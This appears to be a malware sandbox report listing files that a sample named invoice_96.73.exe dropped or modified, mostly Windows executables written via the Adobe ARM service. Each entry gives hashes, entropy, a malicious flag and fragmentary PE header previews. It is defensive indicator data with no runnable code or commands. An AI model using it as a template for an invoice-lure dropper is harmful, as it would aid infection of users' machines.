SHA1:C743E3E41D20A88C00D9B6819C55EC7C9B01AF55
SHA-256:F304247AF7F41AD898EC85E6EAF3483BABA1F6F3D05AA66B087AD0AA97EEA202
SHA-512:968FAFE48F87DF60466514AE9B22B55985D88D45D84384A99ACA060DC74E8E388BB530168609302DD9B681ABB0E05EF145A25CE01E20E01EFDC1D7DE27FCADDA
Malicious:true
Process:C:\Users\user\Desktop\invoice_96.73.exe
File Type:data
Category:dropped
Size (bytes):289280
Entropy (8bit):7.995248566590182
Encrypted:true
SSDEEP:6144:+DIZrt61G9MxhbIFN8RdW8LfECCDUBgDLO4jwxfm9SEy87zXDqXFEmlKr5cn:+AZ61G9MbJRdPLMRUB864sxf+PyOXDqX
MD5:7EEDB9A99831CB037F35277E80A47D25
SHA1:909916D1A61B96E212968E3BD0B7C247FF9F47BD
SHA-256:EC19A24BAB6C6698F41F536D2C837983B5D7D957823CFA5BA1F291E6ACCE33F9
SHA-512:81601D69A103E3D1914BBB51A1F36F8A418CBE04D3AA92D11A06DB87BC60557D75B7011570CE5B47F2CAC9924502CB8AF48FE4AAA0DBE0802A2A2A2E946A33FA
Malicious:false
Process:C:\Users\user\Desktop\invoice_96.73.exe
File Type:data
Category:dropped
Size (bytes):289280
Entropy (8bit):7.995248566590182
Encrypted:true
SSDEEP:6144:+DIZrt61G9MxhbIFN8RdW8LfECCDUBgDLO4jwxfm9SEy87zXDqXFEmlKr5cn:+AZ61G9MbJRdPLMRUB864sxf+PyOXDqX
MD5:7EEDB9A99831CB037F35277E80A47D25
SHA1:909916D1A61B96E212968E3BD0B7C247FF9F47BD
SHA-256:EC19A24BAB6C6698F41F536D2C837983B5D7D957823CFA5BA1F291E6ACCE33F9
SHA-512:81601D69A103E3D1914BBB51A1F36F8A418CBE04D3AA92D11A06DB87BC60557D75B7011570CE5B47F2CAC9924502CB8AF48FE4AAA0DBE0802A2A2A2E946A33FA
Malicious:false
Process:C:\Users\user\Desktop\invoice_96.73.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):12320
Entropy (8bit):7.983858549622769
Encrypted:false
SSDEEP:384:QRvIicY1qxZa66LuMc7MyNgpinNQHbnfQYeAc:x0AxZNtSwnIbnnBc
MD5:1F2CAA7BC8EE995DA3CC740C3F7D1D4A
SHA1:9936BE6E2826B231DE79739BEAAAFF11BA0ED172
SHA-256:B00A77B53D872B61285BFB2E6F690201D556A700E61D3DBA3D83F45F81713EF3
SHA-512:8A1C3F9B974060F66FAB25F9C7C4141C4580096000EA8F678CB44FAF1EF9A559F97FBED69A6C9762339D788C6B769E013E01CE7174ECDC568E927AC67D7D2785
Malicious:false
Process:C:\Windows\System32\msdtc.exe
File Type:CSV text
Category:dropped
Size (bytes):393
Entropy (8bit):5.0655840169633795
Encrypted:false
SSDEEP:6:ptrsXwBRvFNUe+HWXkCpvSLrsXwD87oANUe+HWXkCpCrsXwPX7NfvWe+vj4Yk2v:jrsXwBRVmWnYrsXwDUmWn0rsXwP5/W8I
MD5:48CD226D18D44B6F3B78176045C0C4BF
SHA1:CFCE6F1019EC4918EEE8F362D7D840D4BF45EC19
SHA-256:6BC14FFF7FE81236A8FFF7E50B057BC71F348C43FF62431237675FE19A42D387
SHA-512:FD9AA1018B86D3953CCEFFEA9AF9DD8967912CE894B674D302648DB13D365E080B46C99DBCAB3901C0B2ED5349A4341C57A357E9EC384DF3C0CA0D08CBFAA8CE
Malicious:false
Preview:11-28-2024 06:12 : DTC Install error = 0, going to do CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1101) ..11-28-2024 06:12 : DTC Install error = 0, successfully done CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1141) ..11-28-2024 06:12 : DTC Install error = 0, IN CILogWriteAsynch::Init, d:\w7rtm\com\complus\dtc\dtc\log\logmgr\src\ilgwrta.cpp (173) ..
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1581056
Entropy (8bit):4.151371191753446
Encrypted:false
SSDEEP:12288:Mez2DWUSV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:dz2DWLVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:A88AD079A4084959D6EC9C144B2577BE
SHA1:BB0FDEF8E9B69A1D137AF89AE4AA4FDFB80377BB
SHA-256:22949ED0C9461CFF73CF743006A2C945FEFDCC3A0231F66E802A9B39AB47E628
SHA-512:DFD1FEC0E0A2C5D0E744AFAD4D98B85FFA82F6A9911E8BC5F6482C26E0A13D0DB06E8B57399C1DA9EAE6586084C1C1260FE68D73ED5791F4E5464F8A2EF939E2
Malicious:true
Process:C:\Users\user\Desktop\invoice_96.73.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:modified
Size (bytes):1537536
Entropy (8bit):4.06270126348672
Encrypted:false
SSDEEP:12288:KQVEwpV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:KQTTVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:BBA4722DF24C70555CF255FAE1A123D7
SHA1:B56C45039A5DA0ED09D435B3BED28F161719CAD1
SHA-256:DFC1009BA5D158B79ABF7236A064367CD46E49C331FFAE134E13B5A601F23B24
SHA-512:362A93A30DF082094ED05F17606CA8F9BB390BB2E0B66148CD0D2F8F81E1BDD1F43D86CF4CC189260A2DD001C27545D4E3E632AB20335BFA0A1FED744B9332F6
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1640448
Entropy (8bit):4.193273739028681
Encrypted:false
SSDEEP:12288:pmEp39wV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Zt8Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:93D0DE2BC320CB6900054A5A15B11B8B
SHA1:B59DB39FD929FDB308D55F4DDA19BD7A77C75B61
SHA-256:F0CBE5072491461AC37C9468CC60F87930EC55588A75806F754E416454762E10
SHA-512:4F65D02E30ACAF1506551910A97B65714D5A073CBC40BBFB8B8DF01D0CD53D22B79D15513BD76ED7B486D5C03A6F1B926B6617F0EF47FA65F11CEE243256FC36
Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P..1.1.1.`FM..1.XP...1.cb..1..Q...1..Q.1..Q.1..Q...1.1..}1.`FH..1.XP...1.XP...1.XP.1.Rich.1.........PE..d....k.\.........."..........2.................@.............................P.......a.... .................................................<........P..l....@..h.......................T........................... ................................................text............................... ..`.rdata..............................@..@.data........ ......................@....pdata..h....@......................@..@.rsrc...l....P....... ..............@..@.reloc.......`.......(..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1557504
                                                                                                                                                                Entropy (8bit):4.126538624426098
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:Ov1V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:63Vg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:A2BCD9786CBF60D37D8490431429D8DC
                                                                                                                                                                SHA1:C1AF889C21F1D4D4B6F7A4324202DE5D8C098F15
                                                                                                                                                                SHA-256:79CAC0C495066891E69E205935ACEB6D199521A9FEE4F7B2A552F748B01315DF
                                                                                                                                                                SHA-512:6A6C2587C98EA72C426878EC074EDEA95904F91AAB478C277BAB8F3B1C9521B151745F7CA8392A4C760E2C5D62EDA1A675B1055FA48BB994D519C9075F836BFD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................e~.....B......e~.....e~.....e~............}......}......}.......}......}.....Rich...........................PE..L...C..S............................................................................{B........... ..........................d...........<...........................................................(:..@............................................text...B........................... ..`.data...............................@....rsrc...............................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1613312
                                                                                                                                                                Entropy (8bit):4.205916839131255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:9TNUppvVg9N9JMlDlfjRiVuVsWt5MJMs:9TNepdgFIDRRAubt5M
                                                                                                                                                                MD5:E29960A06D3F74565F82ED6205D852EE
                                                                                                                                                                SHA1:FF986B7206F347BFB595346F815D7282BA590797
                                                                                                                                                                SHA-256:DCFE73696C6639FFE45B1C3B1D1918FB0D400251C634C54A41A72089A75ED68C
                                                                                                                                                                SHA-512:AB55F06F6DF9A9C8CF8BA21B05E3ED99D315756E6415C110EFB9EC77115B227E6974369D0508350BE6EFF89AA174260746A663163D06C6907FA589D4BA3EB729
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~KM..%...%...%.;h....%..~!...%..M....%.T.$...%.T.&...%.T. ...%.T.!...%...$.'.%.;h....%..~,...%..~....%..~'...%.Rich..%.................PE..L...ln.\.........."..........6.......R............@.........................................................................`...........l...........................p...T..............................@...............\............................text............................... ..`.data...p...........................@....idata..............................@..@.rsrc...l...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Users\user\Desktop\invoice_96.73.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1762304
                                                                                                                                                                Entropy (8bit):4.493031751834092
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:etzKexpWLVg9N9JMlDlfjRiVuVsWt5MJMs:etvxg5gFIDRRAubt5M
                                                                                                                                                                MD5:CBA5181DB9E9B202F44EA5591F64BC5F
                                                                                                                                                                SHA1:8C1D0B66F9C03E8BB6A7E36E18D5F3E421454C76
                                                                                                                                                                SHA-256:89EA4C0E4FF6077EB7A306400E832A65B2617A95E824E75E9CCC3325391CD702
                                                                                                                                                                SHA-512:12FB72CC814292755B1891FB955513ADC83FFF7629F86343817607F2EFBF39F33597472B6C7000483F1883FC7A2ABFE65CCC23E2557EF58E0DD079AFD8E1641F
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.H-#.&~#.&~#.&~*.~6.&~=.~'.&~*.~..&~*.~..&~.^K~!.&~.^]~,.&~#.'~..&~*.~3.&~=.~".&~#..~".&~*.~".&~Rich#.&~........PE..L...P..X.....................(.......z............@..........................0......Y........................................}...........9..........................P................................<..@...............h............................text............................... ..`.rdata..L...........................@..@.data....:...........~..............@....rsrc....9.......:..................@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12320
                                                                                                                                                                Entropy (8bit):7.984338331722136
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:e0EHAVyb/xHecLScjT9BmAjBS7aqs3RL6Ctx:e0U/pecL7JuAxtx
                                                                                                                                                                MD5:37F42B4446E913B289E65D1D747C94B2
                                                                                                                                                                SHA1:AF81E8FC0EC39D47858D4C65397F46F699AFDD27
                                                                                                                                                                SHA-256:0A74238579F3B989B485A4BE52E25816BFC263C189F3BCB9F5C1AD791987B45C
                                                                                                                                                                SHA-512:0B1B3A6415CAFCCD7A29100BDE3A49F822CBE8CC68EE429A33C54AD944C3658F1D7887E9C48C042A1B53E7ABF80004D8D2EE9BDE241C5E4CD8EAD77B6A44FB42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.u.V..y....I..`w..h..p...=...{_....I.......f..|uF.@.....wWo...k.*y-....&.\j..Dk......KBK(~.?.S....y.....?R...?....*...O..J.Bd..]f...Y.67.. .Q....bS.F.)....B.L%.u...".D.G.#..P.Y....q+..F.A.he... .@..V.<.L.5v.M..a&.......%J.6.{W;.IA.....I....a...l.(V..........d.H..n..@.BL..L..O1...~9#.....5...U_+;f,[(g.....+..PS...B.&..Q.{........[........i._._.....M5....h.s.k..0..s:..J..+s~...;.,j.ft....m....s^.......8+.<....>5......~..xQ.Lz.,<G[..>..9MT\I.>.....O./...YN<..../`.i...2/....2..jr..?.o...z.f}..5.a..%V..[&.?..M15.D!.8..D.y.LL.W.j.`q.O#....d.J.`....rO+.....N.!<.....3....^..9...0.W...)...|._AJ...|.e.."O..F]....'I.M.....W..M..[1...7.I.x.....5..3=.[...Q).?.#;x...|...F.o.....EY.U....L..o.b.FLP.m...,x$..t.......l....(m......}..}\.....Vf..\\....> .dh....Ef.8..S...y.......@=..N.5....r.S..=r.....5.M.E37.-....N........?...@HB..&_...I..$/dP....;.bm9._.k%%>.EtI.S.k.F.9..J.@z.=$..AH....|.....n.[..'.y.h.>*.[6.q."T.....A4sE..../..S...o...Zt{s.P}.?.........0..F
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1519104
                                                                                                                                                                Entropy (8bit):4.0234568202993835
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:ZV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:jVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:4A3EAAF9D1C0E0BB3F263E7A314171FA
                                                                                                                                                                SHA1:B7D7A0C18899D35D10AB400646213B0A24BD7BBF
                                                                                                                                                                SHA-256:73F7E7E54F4F9D2BBEDA32027B4BBDE576086E9D9235668FECA51B7245E6DAA0
                                                                                                                                                                SHA-512:5C87EB73637025BB2CE7C9D5639AB2C9E93AB80C2345D0479D09C108519F6D9E0D0CC60509A3C9F7A7E36B4AF13EA16A7A43D3BE81B83A2F125957E773A24E37
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........wL_..._..._...V..^...V..^..._.......V..@...V..F...V..^...V..^...Rich_...........PE..L.....[J..................... .......-.......@...............................`...... ............ ..........................|2..@....P..............................................................(...@...p...t.......p............................text...&-.......................... ..`.data........@.......4..............@....rsrc........P.......6..............@..@.reloc.......p.......N..............@...o.[J......[J......[J......[J......[J......[J......[J(.....[JQ.....[Jz.....[J......[J......[J......[J......[J......[J......[J+.....[J......[JQ...........msvcrt.dll.ntdll.dll.RPCRT4.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-Heap-L1-1-0.dll.API-MS-Win-Core-Interlocked-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Win-Core-LocalRegistry-L1-1-0.dl
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1269760
                                                                                                                                                                Entropy (8bit):7.274319568698423
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Rlv3yIUPE1Bubmq3OT6j35Vg9N9JMlDlfjRiVuVsWt5MJMs:RlfyIUPE1BuBeujzgFIDRRAubt5M
                                                                                                                                                                MD5:862331ACCCC3F8DC8BF248C0E6CF16A3
                                                                                                                                                                SHA1:A014E65F4504C52B2CF2EDA31424613FB69DA5DA
                                                                                                                                                                SHA-256:87603B6CEA40695DDB56B87B6C2CB292F80C06CC0B7A00FE8A0C221CFEB9BAAC
                                                                                                                                                                SHA-512:E9E0854F903C5173F8C13398DC9AAA2E335001309B6B158CCAAD58B962943684F297000D649D12BE9EA182F266F669E76765C154BF66F3BDCA08B405F2FA46CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.>e>gP6>gP6>gP67..6<gP67..6.gP6>gQ6.fP67..6*gP67..6.gP67..64gP67..6?gP67..6?gP6Rich>gP6................PE..d...9..L.........."............................@...............................................................................................h............P..T?...................................................................................................text............................... ..`.data....c.......X..................@....pdata..T?...P...@...$..............@..@.rsrc................d..............@..@.reloc...............p..............@...U..L.......L....@..L.......L.......L....7..L.......L.......L.......L....n..L.......L....Q..L....8..L!......L....,..L9...0..LC......LP...O..L\...M..Lh...r..Ls......L............ADVAPI32.dll.ntdll.DLL.pcwum.DLL.KERNEL32.dll.msvcrt.dll.VERSION.dll.SHLWAPI.dll.RPCRT4.dll.TAPI32.dll.GDI32.dll.WINSPOOL.DRV.US
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1508864
                                                                                                                                                                Entropy (8bit):3.999993628788772
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:dV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:vVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                                                                                                                MD5:16E5AF7C321FDD4D4ABCA40501F44C18
                                                                                                                                                                SHA1:33271C58B23847E9575E158BA66E9D0585A01E2C
                                                                                                                                                                SHA-256:39C588E940128285CFBBCF70925361112CCF626F78DE8F13C65D170C6E946915
                                                                                                                                                                SHA-512:23EE62A4A769049B76C77FD4E37701D3D974DA2B293414FE277B2E9783E17C5DB5CF1A1642DB3CA939390782084FF6F971AC2CBB984EF9A9BA6D9FA536A9D9C3
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l_.............f.......f...............f.......f.......f.......f.......f......Rich....................PE..d...Q.[J..........".................<........................................P......~1............... ...............................................P.......@..........................................................................p............................text............................... ..`.data...P....0......................@....pdata.......@......................@..@.rsrc........P......................@..@.reloc.......`.......&..............@....[Jx...+.[J....+.[J....^.[J....^.[J......[J......[J......[J'.....[JG...+.[J......[Jq...+.[J......[J......[J............msvcrt.dll.NTDLL.DLL.API-MS-WIN-Service-Core-L1-1-0.dll.API-MS-WIN-Service-winsvc-L1-1-0.dll.API-MS-Win-Core-ErrorHandling-L1-1-0.dll.API-MS-Win-Core-LibraryLoader-L1-1-0.dll.API-MS-Wi
                                                                                                                                                                Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                Entropy (8bit):0.2885420714790396
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:/2lAwtvU07qF69Fq5C1qx6CzE5Z2+fqjF+:/Cdvj1V1qRiY+fC+
                                                                                                                                                                MD5:EBA89C0AABCF9C08B085258BD4E1EC53
                                                                                                                                                                SHA1:3883BBB39DEF0C7B91C90098B04894B6DFAEFB95
                                                                                                                                                                SHA-256:2FB904639E10DDC2DAE1DB85275CF25ED3497F3909F2B0B3FD45012E33B7FB49
                                                                                                                                                                SHA-512:74C786E5908B7C5506CBAD46A1320395D6EBD157EB4E945DF522F878DF957457104097628140ED767DE5E5D81EC4DAB9D4B8141A141E649959C62B34923DC452
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.@......................................................................................Wm...............@......................aa..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................9.mr.... .....P..\.A..........M.S.D.T.C._.T.R.A.C.E._.S.E.S.S.I.O.N...C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.S.D.t.c.\.t.r.a.c.e.\.d.t.c.t.r.a.c.e...l.o.g.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1173504
Entropy (8bit):7.173665625934242
Encrypted:false
SSDEEP:24576:k9Bcju8+g/Gb4uzVg9N9JMlDlfjRiVuVsWt5MJMs:kQStg/Gb44gFIDRRAubt5M
MD5:7E061EBDFE0521A35049E6D587FB7295
SHA1:9A29AAFD3A8C2DE45BD4C415707A65840C049A0D
SHA-256:9745F632916C36A2460D115D11DFFAA0CB98C4FEF7C8E95C44DD8064F51C97DE
SHA-512:F02E6D27382159ACA41E03D6B0CCA6D8BBECEC3C6D8A804EDB9F50CE421FEF6EBFCCCACCE1D5A6136C139A583A2D32507B7C0AA16EDFBD92B6398B0E9BEBD7EC
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2180096
Entropy (8bit):6.687257367542032
Encrypted:false
SSDEEP:49152:T4W+J/pHuR7n20mT4FE2LnwUxfvgFIDRRAubt5M:EsxgUf
MD5:E35ACC5A7E387F3E224A1F35E9FFBE11
SHA1:228A169C86642ADC20641A74C10F0D07215BAD91
SHA-256:E5541C557F0CE94736DD8FF7927A16AB422EC395641B584348417227E923A5BF
SHA-512:96085BC8C46E662D48FC72036988EB30DEB6A32903B0531BA968A79413EF3D4A31DCBDBF5D0354ED2FA5541CB756177E778AFC9AE7D43B8928645E25FD64B8BC
Malicious:true

Process:C:\Users\user\Desktop\invoice_96.73.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1577472
Entropy (8bit):4.148166410307214
Encrypted:false
SSDEEP:12288:wLeYV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:wLeUVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:D51E3C5F1FB63103D04A4FDBBC56FEE7
SHA1:692DF203C8DDF5357AF66600481815440D83E010
SHA-256:6547261C1535DFBE5DD413D4F1DF924B9AD82B1A730D322F06E51810217E5931
SHA-512:40C825B5F93F377B21802FA90BEB2EF35ECB7337B2ED0C424D3574D404A973A55B2C74ADBFD1F02C1FD3C87F0A854D6A0A89D351BBB922B27D5EC18A6FF5E6FF
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1508352
Entropy (8bit):3.9945760567474156
Encrypted:false
SSDEEP:12288:GV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:WVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:0F5B09C2B87A9F58233F4C265F891275
SHA1:73AFF2EC53F77218DD0BFAD179868D15A76448BA
SHA-256:9EE7032DB4615C8B62DC901D37D4D1F29A00FA61290202790EEA5FD6B366AD7C
SHA-512:A131F258FF1A08A9E8AE0C76FA8CD3E859401EA55978AA1BD7CE46140F717FE0BEE48E2F18B746A9A9C89CAF9474E65855AF0CAE3B2A4905A816566BF376E57E
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1612800
Entropy (8bit):4.210831825475154
Encrypted:false
SSDEEP:12288:XERpPV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:6p9Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:475B5B41F2CFABE32500D1A9602C2A3E
SHA1:C71BC97C9DEFB4A3958CE628E460C11AC74F4801
SHA-256:4293F6F72EBC40C6E4C5E3D358D092BF8556B1291489CC2996DFB5AE5B2244B9
SHA-512:F93926EF23DEA35E533FEE3CAE6F29EC422AA02B79AC58AA737BEE37E66C6F091DC8154E4C6F75C10EF055AB11F5BB2EF998A6A2324273CF2105EC539B79C6E3
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1639936
Entropy (8bit):4.188266282630206
Encrypted:false
SSDEEP:12288:Oky+V3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Zy+Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:8A39539F9626492BC25BBEF9E516EC26
SHA1:30A72514FFE2EDBDD8637884AF0E106955C5437B
SHA-256:B85BE38107062EA87F118A93AB23401EC3E949BB4B9CC6CEC09BC567A3144DE6
SHA-512:78CA0E9E1DB2CCA8ADC717FD2D7F1908632C7C2225A2624BC89A5335888C4F5F111AC3D1E584664618A73527B1B1890BE6F824A591DB4BD8DB78C3E84F95D5CC
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1625600
Entropy (8bit):4.2224518673321185
Encrypted:false
SSDEEP:12288:y81ONGM1cV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:H41gVg9N9JMlDlfjRiVuVsWt5MJMs
MD5:2568F4F643C82673898904F584A264BA
SHA1:79519E3BAA9B9073A1819D8ECF33C623681DCCD7
SHA-256:2D21E0A47C95FA5A2F8B0D882F6D6AF25A4103BD421631D78CC6A3C1166477B0
SHA-512:82352C84D08C4F7B3302ADFBB10F90DDC5C64800D0AA8BF2FCC815D9BD9F7BA6AE957EFA89981D7E5962AB2F6DA6DBDBCDE0821B89B275CDE701F08478725D88
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1512960
Entropy (8bit):4.011174800223528
Encrypted:false
SSDEEP:12288:SPV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:S9Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:2A428B8B0253AA1D839ED564BA512230
SHA1:F609022F2A47AF21EFC6FA08AA9798CA6FBB5D7C
SHA-256:9F95CC146CC7FBE17FD95FF7D61AA7F319EE12624FD54B3976D17FC5D2AD9DF1
SHA-512:14600D65A165E02438413CFD04E66C4D85207ADF93E2C7D1DC3B35E439AC5F4D37ADD5844E97B910AADBCFF23EAAF7DABAFC66EAAEAF4C67D7DFEF59B4A5BC1A
Malicious:true

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):4106240
Entropy (8bit):7.320766799638362
Encrypted:false
SSDEEP:49152:aadpFZx1nkQoqvUbvgXELEnAR0gXV/XB+7nZE1GhnuFnNeNMWo8CWgiV5omI05IX:RFZxeecao3yudFnN0DHIesUf
MD5:1BFA3EDF35211FF6EEDA3F3D010CF0F6
SHA1:1B034FD9E4E2D2DD100C43714BD0B403FDE7BC55
SHA-256:FAF7A8737727328CAF5860FE6EC5D5BB85C1AA23B9E5391C24DD1D7AF45AB572
SHA-512:A58422471991C9627107643716C82E58A0467606CE21B4DCB0C9F52D689ADDA1797B7647AB3B91F8D3B7BE7EEB4AB41166C534C6F810DA18C1CECD5ECB85B47B
Malicious:true
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2029568
                                                                                                                                                                Entropy (8bit):4.790645850085516
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:LvMgzNciyYe13kvoUGVg9N9JMlDlfjRiVuVsWt5MJMs:bcibeUoUCgFIDRRAubt5M
                                                                                                                                                                MD5:CC2DA4A13C382DA8674052AB5005C252
                                                                                                                                                                SHA1:2F75BD4F4FE4CF5BA3A0C23D76C396A25EC87D76
                                                                                                                                                                SHA-256:4993E48087833157D2C34E79357415B7BBEB955AE832EE3E3A5BD9EBD56026C4
                                                                                                                                                                SHA-512:B65E1CE94E1F9A83A5554CC95CC30220B3785B84EFBA004D4C88DA27D170901A16B6EB760F1C72541C366B5D7D059C6D7DD77AB8ADEB40EABC9C54F415517234
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................................Rich...........................PE..d... ..L.........."..........P......lT.......................................@.......,............... ...................................#.....D....@..........."..................P...........................................d...................................text............................... ..`.data...x...........................@....pdata...".......$..................@..@.rsrc........@......................@..@.reloc.......P......................@......L ......L+...7..L5......L+...h..L@......L+......LH......Li......L.......L.......L.......L+......L.......L.......L;......Ld......L.......L.......L.......L.......L+......L.......L!......L+......LB......Le......L.......L.......L.......L.......L#...\..L0...5..L=......LJ......LV...........
                                                                                                                                                                Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1696768
                                                                                                                                                                Entropy (8bit):4.315210133032662
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:R/UpJVupkVg9N9JMlDlfjRiVuVsWt5MJMs:RU0pkgFIDRRAubt5M
